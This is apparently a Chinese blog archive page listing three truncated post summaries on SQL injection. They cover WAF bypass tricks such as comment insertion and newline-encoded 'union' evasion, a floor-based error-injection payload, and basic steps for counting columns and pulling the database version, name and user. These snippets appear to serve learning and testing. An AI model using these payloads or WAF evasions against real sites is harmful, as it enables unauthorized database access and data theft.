12 2022 档案
WAF绕过
摘要:如果被拦截,首先可以更改提交方式如果拦截相应函数(比如database()),可以使用注释符进行绕过(database/**/()){/**/是注释符} union select 1,2,3 (union select)被拦截可以union #a %23a%0A %0A是换行符 用#闭合a,让安全狗
报错注入语句
摘要:常用的三个报错注入语句: floor报错 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)--+ union select
简单sql注入思路
摘要:1.判断注入点 猜解列名数量.... ?id=1 order by x (x为数字) 2.报错猜解...?id=-1 selecet 1,2,..,x 3.信息收集数据库版本:version()数据库名字:database()数据库用户:user()操作系统:@@version_compile_os
